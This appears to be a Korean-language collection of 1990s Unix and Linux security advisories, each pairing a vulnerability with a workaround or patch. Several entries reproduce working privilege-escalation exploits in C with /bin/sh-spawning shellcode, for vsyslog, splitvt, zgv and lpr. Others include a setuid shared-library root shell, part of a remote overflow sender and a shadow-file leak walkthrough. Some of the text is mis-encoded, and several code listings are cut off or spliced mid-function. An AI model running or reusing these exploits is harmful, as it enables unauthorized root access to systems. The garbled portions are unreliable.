명령
net/unix/garbage.c
시스템
커널 2.0.x
문제점
NR_FILE (or /proc/sys/kernel/file-max)을 1024 보다 더 크게 하므로써
문제가 발생할 수 있다.
그에 대한 소스는 공개하지 않겠다.
왜냐.. 아직 해결 방법이 없는 듯하다.
2.0.33버젼을 깔아보아도 역시 버그가 생긴다.
해결책
궁여지책으로 각유저의 프로세스를 6개 미만으로 할당 시키는 것이다.
---------------------------
제 목: [보안] 리눅스 vsyslog()
명령
vsyslog() overflow
시스템
Linux with libc 5.4.23 and RH 5.3.12-18
문제점
이 문제점은 libc 5.4.38에서 고쳐졌다.
vsyslog()함수를 버퍼 오버 플로우 시켜 이를 이용한다.
$ id
uid=100(guest)
$ ln -s /bin/su hahaha
$ export PATH=.:$PATH
$ hahaha
Password:
# id
uid=0(root) gid=0(root)
# tail -1 /var/log/messages
Jan 6 00:37:36 guest hahaha: root on /dev/ttyp2
À̱ ½ÄÀ¸Î µÈ´Ù. ¿ø¡ su ¸¦ Çؼ çƮΠµÇ¾úÀ»¶§´Â
Jan 6 00:37:36 guest su: root on /dev/ttyp2
Î µÇ¾î¾ß ÇÑ´Ù.
¿©±â¿¡´Â ¾î¶² º¸¾È»ó ÇêÁ¡ÀÌ ¾ø´Ù. ÇÏÁö¸¸ ÀÌ°ÍÀº openlog()À» À§ÇÑ
argv[0]À» »ç¿ëÇϴµ¥ ¾î¶² °¡´É¼ºÀÌ º¸ÀδÙ.
ÀÌ°ÍÀ» ´õ ÀÚ¼¼ÇÏ°Ô º¸À̸é..
½© Äڵ忡 '/' ¸¦ ¾µ¼ö ¾ø´Â °ü°èÎ.. _bin_sh ¶ó°í ½©Äڵ忡 ¸í½ÃµÇ¾î
ÀÖ´Ù. ±×¸®ÇÏ¿© /bin/sh ¸¦ _bin_sh Î º¹»çÇصξî¶ó.
±×¸®°í ÇöÀçÀÇ PATH ¿¡ '.'¸¦ Ãß°¡ ½ÃÄѶó.
±×¸®°í³ª¼ ÀÌ ÇÁαץÀ» µ¹Á¾ß ÇÑ´Ù.
/*
vsyslog()/openlog() exploit by BiT - 8/8 1997
Greets to: doodle, skaut, melon, kweiheri etc.
*/
#include
#include
unsigned long get_esp(void)
{
__asm__("movl %esp, %eax");
}
void main(int argc, char **argv)
{
unsigned char shell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff_bin_sh";
char *buf,*p;
unsigned long *adr;
int i;
if((p=buf=malloc(2028+28)) == NULL)
exit(-1);
memset(p,0x90,2028);
p+=2028-strlen(shell);
for(i=0;i
int main()
{
char ident[4096];
memset(ident, 'x', sizeof(ident));
ident[sizeof(ident) - 1] = 0;
openlog(ident, 0, LOG_AUTHPRIV);
syslog(LOG_NOTICE, "message");
return 0;
}
이를 고치려면 이곳에서 패치하라
http://www.false.com/security/linux-stack/
---------------------------
제 목: [보안] 리눅스&유닉스 X서버R5,R6
명령
X서버 X11R6 , X11R5
시스템
X11R6 이 깔린 시스템
문제점
X11R6을 시스템에 인스톨시 setuid 나 setgid 가 붙는다.
XF86_드라이브 이런것들은 setuid 가 root 이다.
그러나 로컬유저가 버퍼 오버런을 이용해서 특별한 권한을 가지게 될수
있다.
엑스 서버가 시작되는 동안에 ResetHosts() 함수를 호출한다.
그럴때 display 를
X :00000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000009
이런 식으로 설정할때... 버퍼 오버 플로우를 일으킬수 있는 잠재력을
가지고 있다.
해결책
1) 엑스 서버를 인스톨 한후 모든 setuid 나 setgid 를 없애라.
2) xdm을 쓰거나 안전한 setuid 와퍼로 X서버를 시작하라.
이것은 버그에 따른 와퍼이다.
설치 법은 영어로 간단하게 써있으므로 잘 보면서 설치하라.
/*
Description: X server wrapper
Instalation steps:
0. Become root (su -)
1. Modify the X_Server program variable according to your
taste (i.e. the X server true path, not the link to it!)
2. Compile this program as
cc Xserver.c -O4 -o Xserver
3. Copy the resulting binary to /usr/X11/bin, or whatever
path you may have
4. chmod 04711 Xserver
5. Suppose your X server is called "XF86_S3"; issue a command
chmod 0711 XF86_S3
6. Remove the old link for X (e.g X -> /usr/X11/bin/XF86_S3)
7. Make a new link
ln -s /usr/X11/bin/Xserver /usr/X11/bin/X
Copyright policy: the GNU Public License.
This program is intended as a temporary patch for an existing
X server; it is provided "as is", the author is not
responsible for any direct/indirect damage(s) caused by its
use.
*/
#include
#include
#include
#include
#include
#include
/*
This is intended for debugging porposes only.
Do NOT define this for a normal usage!!
*/
#define _DEBUG
#define SIZE 1024
/* guaranteed filled with NULLs by UNIX */
char* args[SIZE];
int argsCount = 0;
char* sccsID =
"@(#) X wrapper 1.0 Copyright (C) 1998 by Vadimir COTFAS (ulianov@mecanica
.math.unibuc.ro), Jan 14th 1998";
char *X_Server = "/usr/X11/bin/XF86_S3";
int main(int argc, char* argv[])
{
int i;
uid_t uid, euid;
struct passwd* pass;
openlog("Xserver", LOG_CONS|LOG_NDELAY|LOG_PERROR|LOG_PID,
LOG_AUTHPRIV);
uid = getuid(); euid = geteuid();
if(!((uid==0) || (euid==0))){
fprintf(stderr,"Xserver: this program must be run as (setuid) root\n")
;
exit(1);
}
pass = getpwuid(uid);
for(i=0; i 2)){
syslog(LOG_NOTICE, "potential buff ovrflw at arg #%d user %s",
i, pass->pw_name);
continue;
}
if(strstr(argv[i], "-config")){
syslog(LOG_NOTICE, "security vulnerability at arg #%d user %s \n",
i, pass->pw_name);
i++;
continue;
}
if(argsCount >= SIZE){
syslog(LOG_NOTICE, "too many args (>1024) user %s \n
",
pass->pw_nam
e);
exit(1);
}
args[argsCount++] = argv[i];
}
args[argsCount] = NULL; /* just to be sure */
#ifdef DEBUG
for(i=0; i
#include
int _init() {
char *sh[2];
sh[0] = "/bin/sh";
sh[1] = NULL;
setuid(0);
setgid(0);
seteuid(0);
execve(sh[0], sh, NULL);
}
해결책
chmod u-s quake2 게임은 혼자하는 거니까 setuid 를 없애는 것이 낫다.
반드시 해야 할 상황이라면
http://synergy.caltech.edu/~ggi/ 에 가면 해결책이 있다.
---------------------------
제 목: [보안] 리눅스 imapd (2)
명령
imapd , ipop3d
시스템
슬랙 3.3(imapd 만 해당), 슬랙 3.4
문제점
초기 슬랙웨어에서는 이 버그가 허용되지 않았다.
알수 없는 유저가 들어오려할때 imapd 와 ipop3d 데몬은
코어 덤프를 일으킨다.
그런데 그 파일에 쉐도우 파일이 첨가되어있다.
그 이유는 두개의 데몬들이 유저를 로그인시키려면 쉐도우 파일을
읽어들이기 때문이다. 이때 코어 덤프가 생겨서 / 디렉토리에
core 파일이 생긴다.
[root@koek] /# telnet host 110
Trying 10.10.13.1...
Connected to host.com
Escape character is '^]'.
@
+OK some host POP3 3.3(20) w/IMAP2 client (Comments t
o
MRC@CAC.Washingto
n.EDU) at Sun, 1 Feb 1998 23:45:06 +0100 (CET)
user root
+OK User name accepted, password please
pass linux
[this is not the correct password]
-ERR Bad login
user john
[no user named john]
+OK User name accepted, password please
pass doe
Connection closed by foreign host.
/ µðºÅ丮¿¡ °£ÈÄ¿¡
[root@zopie] /# strings core | grep -A3 root
root
[crypted pw here]
10244
Sun Feb 1 23:45:15 1998
--
root:[crypted pw here]:10244:0:::::
halt:*:9797:0:::::
operator:*:9797:0:::::
shutdown:*:9797:0:::::
[looks like /etc/shadow]
--
root:[crypted pw here]:10244:0:::::
john
host.com
PASS
해결책
우선은 막아두며 패치 버젼이 나올때까지 기다린다.
---------------------------
제 목: [보안] 리눅스 xServer (위험)
* 이 버그는 상당히 위험한 버그이므로 절대로 악용하지 말길
바란다. 부탁이다.
명령
XServer
시스템
인텔 x86의 엑스 서버
문제점
엑스 서버의 문제점은 과거에 부터 문제점이 제기되어왔다.
디스 플레이를 xx로 채워서 세그먼트 폴트를 나오게 한 것은
버퍼 오버 플로우의 가능성을 보여주었다.
다음과 같은 소스로 일반 사용자가 루트를 얻을 수 있다.
해결책
우선은 셋유저 아이디를 없애라..
또한 /usr/X11R6 디렉토리의 퍼미션을 750 으로 해두고
그룹을 정해서 필요한 사람만 쓰게 하라.
---------------------------
제 목: [보안] 리눅스 cron
명령
vixie cron
시스템
vixie cron(버젼 3.0.1-20이하)이 설치된 리눅스,BSD
문제점
/usr/bin/crontab 은 셋유저 아이디가 루트로 붙어있다.
그런데 매시간 유저에 의해 불려지게 되면 루트 소유의 임시 탬프 파일이
생긴다.
이 파일은 /var/spool/cron 디렉토리 이다.
그런데 이때 만들어지는 임시 파일들은 자신에게 할당된 쿼터에 영향을
받지 않는 경향이 있다.
이에 쿼터에 상관없이 디스크 full 을 만들 수 있다.
어떤 일련의 과정을 하게 되면 이렇게 된다.
[root@genome /]# ls -l /var/spool/cron
total 25106
-rw------- 1 root root 769 Nov 27 20:21 root
-rw------- 1 root lcamtuf 5120000 Feb 5 15:01 tmp.453
-rw------- 1 root lcamtuf 5120000 Feb 5 15:02 tmp.468
-rw------- 1 root lcamtuf 5120000 Feb 5 15:03 tmp.469
-rw------- 1 root lcamtuf 5120000 Feb 5 15:03 tmp.482
-rw------- 1 root lcamtuf 5120000 Feb 5 15:03 tmp.483
이렇게 되어 나중엔 파일이 꽉차게 된다.
해결책
아직 나와있는 뚜렷한 해결책은 없다..
단지 suid 를 없애는 수 밖에..
chmod 700 /usr/bin/crontab 를 임시로 해주면 된다.
---------------------------
제 목: [보안] SUNOS tmpfs
명령
tmpfs
시스템
SunOS 4.1.4
문제점
야마모리 타케노리씨가 발견한 것이다. tmpfs 에 문제가 있다.
이 버그로 인해 커널 패닉을 일으키면서 시스템이 죽는다.
스크린이나 기타 멀티로 두개로 접속을 한다.
아니면 스크린이라는 기능을 이용해서 화면을 두개로 나누든지..
$ /tmp
$ mkdir a
$ cd a
$ vi b (bÆÄÀÏÀ» ¿°í¼ ¾Æ¹«±ÛÀ̳ª ¾´´Ù. ±×»óÅ¿¡¼...)
[ switch screen ] <=(½ºÅ©¸°ÀÇ °æ¿ì ´Ù¸¥ ½ºÅ©¸°À¸Î ¹Ù²Ù¾î¶ó.& ¸ÖƼ)
$ rm -r /tmp/a
[ switch screen ] <=(´Ù½Ã ¿ø¡»óÅÂÎ °£´ÙÀ½..ÀúÀåÇغÁ¶ó....)
(save the file using :w in vi)
커널 패닉을 일으키면서 시스템이 죽는다.
해결책
패치 번호 103314-01 을 선사이트에서 찾아서 패치하라
---------------------------
제 목: [보안] 솔라리스 volrmmount
명령
volrmmount
시스템
SunOS 5.6 (sparc and x86)
문제점
volrmmount프로그램은 setuid 가 걸린 프로그램으로써 모든유저들에게
매체(media)를 열거나 넣을수 있게 허락해준다.
그런데 이 프로그램을 공격할 수가 있다. 그것에 의해 일반 사용자들이
그 시스템의 어떤 파일이든지 볼수 있고, 루트의 권한을 획득할수도 있다.
해결책
다음의 패치 버젼을 가져오면 된다.
OS version Patch ID
__________ ________
SunOS 5.6 105407-01
SunOS 5.6_x86 105408-01
---------------------------
제 목: [보안] 솔라리스 dtappgather (따끈~)
명령
/usr/dt/bin/dtappgather
시스템
CDE 버젼 1.0.2 가 깔린 솔라리스 2.5 2.5.1
문제점
/usr/dt/bin/dtappgather 프로그램은 setuid 가 root 로 걸려있는
프로그램이다.
그런데 솔라리스 2.5 2.5.1 에서는 /usr/dt/bin/dtappgather 디렉토리가
777 모드로 되어있어서 누구든지 쓰고 읽을 수가 있다.
( 솔라리스 2.6에서는 755 모드로 되어있다. :-) )
generic-display-0 라는 파일을 미리 만들어 놓고 setuid 가 걸린
/usr/dt/bin/dtappgather 을 실행시키면 파일에 변화가 온다.
이를 이용하면 쉽게 시스템의 모든 파일을 읽고 쓰고 할 수가 있게된다.
간단하면서도 무서운 버그이다.
해결책
#include
#include
#define DEFAULT_OFFSET -202
#define DEFAULT_BUFFER_SIZE 211
#define DEFAULT_ALIGNMENT 2
#define NOP 0x90
/* This shell code is designed to survive being filtered by toupper()
*/
char shellcode[] =
"\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
"\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
"\xeb\x05\xe8\xdb\xff\xff\xff"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
해결책
chmod 700 squake
---------------------------
제 목: [보안] 리눅스 splitvt
명령
splitvt(1)
시스템
Linux 2-3.X
문제점
로컬 유저가 루트로 로그인 할 수 있다.
오버 플로우를 일으킬 수가 있다.
crimson~$ cc -o sp sp.c
crimson~$ sp
bash$ sp
bash$ splitvt
bash# whoami
root
sp.c ---------
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main()
{
char eggplant[2048];
int a;
char *egg;
long *egg2;
char realegg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *eggie = realegg;
egg = eggplant;
*(egg++) = 'H';
*(egg++) = 'O';
*(egg++) = 'M';
*(egg++) = 'E';
*(egg++) = '=';
egg2 = (long *)egg;
for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;
egg=(char *)egg2;
for (a=0;a<0x40;a++) *(egg++) = 0x90;
while (*eggie)
*(egg++) = *(eggie++);
*egg = 0; /* terminate eggplant! */
putenv(eggplant);
system("/bin/bash");
}
해결책
700 모드로 하는게 상책이다.
아니면 각자의 리눅스 페이지로 가서 업그레이드를 한다.
---------------------------
제 목: [보안] 리눅스 admin
명령
admin
시스템
Linux systems running admin-v1.2 and older ones (others?)
문제점
admin-v1.2 패키지에 있는 시스템 어드민 툴에서 버그가 발견되었다.
로컬 유저가 /tmp디렉토리의 어드민 툴 관련 파일을 지우고 이를 링크
시켜서 루트의 권한으로 어디든 파일을 만들 수 있다.
/tmp/name.$$ 라는 파일의 형태로 존재한다.
이 파일을 /etc/passwd에 연결시켜서 passwd파일을 고칠 수도 있고
/.rhosts 를 만들 수도 있다.
해결책
700 모드로 바꿔라
---------------------------
제 목: [보안] 리눅스 svgalib/zgv
명령
svgalib/zgv
시스템
Redhat Linux 3.0.3 - 4.1
어떤 리눅스든지 zgv에 setuid root 인것
문제점
½ºÅà ¿À¹öÖÀÌÆ®¸¦ ÀÏÀ¸ÄѼ ¹öÆÛ ¿À¹ö± °ø°ÝÀ» ½ÃµµÇϸé çÆ®¸¦
¾òÀ» ¼ö ÀÖ´Ù.
zgv-2.7 Àº GIF³ª JPG¸¦ º¼¼ö ÀÖ´Â ºä¾î ÀÌ´Ù.
/*
*
* zgv exploit coded by BeastMaster V on June 20, 1997
*
* USAGE:
* For some strage reason, the filename length of this
* particular exploit must me one character long, otherwise you
* will be dropped into a normal unpriviledged shell. Go Figure....
* Try increasing the offest by increments of 10 if you get
* an Illegal Instruction or Segmentation Fault.
*
* $ cp zgv_exploit.c n.c
* $ cc -o n n.c
* $ ./n
* Oak driver: Unknown chipset (id = 0)
* bash#
*
* EXPLANATION: zgv (suid root) does not check bounds for $HOME env.
*
*/
#include
#include
#include
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 4096
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() -4675;
memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("HOME", buffer, 1);
n = CHOMP(sk, buf);
buf[n] = '\0';
printf(buf);
SAY(sk, POST);
n = CHOMP(sk, buf);
buf[n] = '\0';
printf(buf);
sleep(2);
printf("Sending overflow data.\n");
while((n = CHOMP(dfd, buf)) > 0)
write(sk, buf, n);
sleep(2);
}
void main(int argc, char **argv)
{
char *victim, *filename;
int s;
me = basename(argv[0]);
if(argc != 3)
usage();
filename = argv[2];
send_egg(s = news_sock(victim = argv[1]), filename);
select_loop(s);
fprintf(stderr, "Connection closed.\n");
printf("Remember: Security is futile. Dweebs WILL own
you.\n");
exit(0);
}
------------------------------------------------------------------
해결책
아래의 사이트에 가서 패치 버젼을 받는다.
http://www.purplefrog.com/~thoth/netpipes/
---------------------------
제 목: [보안] 리눅스 libXt (2)
명령
libXt
시스템
RedHat 4.0, 4.1, 4.2
문제점
버퍼 오버플로우를 일으켜서 루트를 얻을 수 있다.
이것은 libXt자체가 문제가 있으므로 그 파급 효과는 엄청나다.
해결책
$ cd /usr/X11/bin
$ find . -type f -a \( -perm -2000 -o -perm -4000 \) -print
위의 명령으로 setuid root인 파일을 찾아서 모두 setuid를 없애라.
아래의 사이트에서 자신에게 맞는 것을 골라 업그레이드 시켜라.
o Red Hat Linux/Alpha 4.1, 4.2
ftp://ftp.redhat.com/updates/4.2/alpha/XFree86-devel-3.2-10.alpha.rpm
ftp://ftp.redhat.com/updates/4.2/alpha/XFree86-libs-3.2-10.alpha.rpm
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/XFree86-devel-3.$
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/XFree86-libs-3.2$
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/XFree86-libs-3.2$
o Red Hat Linux/SPARC 4.0, 4.1, 4.2
ftp://ftp.redhat.com/updates/4.2/sparc/X11R6.1-devel-pl1-21.sparc.rpm
ftp://ftp.redhat.com/updates/4.2/sparc/X11R6.1-libs-pl1-21.sparc.rpm
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/X11R6.1-devel-pl$
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/X11R6.1-libs-pl1$
---------------------------
제 목: [보안] 리눅스 lpr (2)
명령
lpr
시스템
Linux 2.0.0, 2.0.30 (SW 3.0)
문제점
lpr ffffffffff.......ffff (to 1023 characters)
위와 같이 하여 버퍼 오버플로우를 일으키는 문제로 루트를 얻는다.
/*
* lpr_exploit.c - Buffer overflow exploit for the lpr program.
* Adapted from code found in "stack smashing..." by Aleph One
* aleph1@underground.org
*
* "wisdom is knowledge passed from one to another", Thanks
*/
#include
#define DEFAULT_OFFSET 1023
#define DEFAULT_BUFFER_SIZE 2289
#define NOP 0x90
/*
* The hex representation of the code to produce an interactive shell.
* Oviously since this is for a Linux Box, you may need to generate
*/
char shellcode [] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{ __asm__("mov %esp,%eax"); }
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
/* set aside the memory for our shell code */
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
/* Get the address of our stack pointer */
addr = get_sp() - offset;
/* fill our buffer with its address */
ptr = buff;
addr_ptr = (long *)ptr;
for(i = 0; i-- lpr.c --<
/*
* /usr/bin/lpr buffer overflow exploit for Linux with
* non-executable stack
* Copyright (c) 1997 by Solar Designer
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SIZE 1200 /* Amount of data to overflow with */
#define ALIGNMENT 11 /* 0, 8, 1..3, 9..11 */
#define ADDR_MASK 0xFF000000
char buf[SIZE];
int *ptr;
int pid, pc, shell, step;
int started = 0;
jmp_buf env;
void handler() {
started++;
}
/* SIGSEGV handler, to search in libc */
void fault() {
if (step < 0) {
/* Change the search direction */
longjmp(env, 1);
} else {
/* The search failed in both directions */
puts("\"/bin/sh\" not found, bad luck");
exit(1);
}
}
void error(char *fn) {
perror(fn);
if (pid > 0) kill(pid, SIGKILL);
exit(1);
}
void main() {
signal(SIGUSR1, handler);
/* Create a child process to trace */
if ((pid = fork()) < 0) error("fork");
if (!pid) {
/* Send the parent a signal, so it starts tracing */
kill(getppid(), SIGUSR1);
/* A loop since the parent may not start tracing immediately */
while (1) system("");
}
/* Wait until the child tells us the next library call will be
system() */
while (!started);
if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH");
/* Single step the child until it gets out of system() */
do {
waitpid(pid, NULL, WUNTRACED);
pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);
if (pc == -1) error("PTRACE_PEEKUSR");
if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0))
error("PTRACE_SINGLESTEP");
} while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK));
/* Single step the child until it calls system() again */
do {
waitpid(pid, NULL, WUNTRACED);
pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);
if (pc == -1) error("PTRACE_PEEKUSR");
if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0))
error("PTRACE_SINGLESTEP");
} while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK));
/* Kill the child, we don't need it any more */
if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL");
pid = 0;
해결책
이 디바이스의 퍼미션을 일반 유저가 읽기만 가능하도록 하라
일반 유저가 쓰기를 할 수 없도록 하라
chmod 664 /dev/psaux
---------------------------
제 목: [보안] 리눅스 telnet (1)
명령
telnet
시스템
RedHat 4.0
문제점
원하는 호스트에 어떤 계정이 있는지 없는지를 확인 할 수 있다.
예를 들어.
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Red Hat Linux release 4.0 (Colgate)
Kernel 2.0.24 on an i586
login: bug
Password:
Login incorrect
Connection closed by foreign host.
없는 계정을 입력시에 한번에 끝난다.
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Red Hat Linux release 4.0 (Colgate)
Kernel 2.0.24 on an i586
login: root
Password:
Login incorrect
login:
login:
login:
login:
계정이 있을 경우 계속 물어 본다.
---------------------------